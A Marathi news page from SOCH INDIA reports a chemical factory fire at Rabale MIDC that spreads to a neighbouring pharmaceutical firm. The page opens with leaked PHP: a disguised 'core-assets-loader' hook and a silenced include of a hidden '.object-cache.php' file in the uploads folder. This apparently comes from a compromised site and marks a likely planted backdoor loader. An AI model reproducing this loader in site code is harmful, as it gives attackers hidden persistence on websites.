add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Rabale MIDC Fire | रबाळे एमआयडीसी परिसरात भीषण आग – SOCH INDIA
Menu

देश
Rabale MIDC Fire | रबाळे एमआयडीसी परिसरात भीषण आग

nobanner

बेलापूर औद्योगिक वसाहती परिसरातील रबाळे औद्योगिक वसाहतीमध्ये केमिकल कंपनीला आग लागली आहे. आगीने क्षणार्धात भीषण रूप धारण केले आहे.

प्लॉट नंबर W – 46  या कंपनीला ही आग लागली आहे. या आगीने बाजूला असलेल्या औषधांच्या कंपनीलादेखील आपल्या विळख्यात घेतले आहे.

अग्नीशमन दलाच्या दोन गाड्या घटनास्थळी दाखल झाल्या असून आग विझवण्याचे काम सुरू आहे.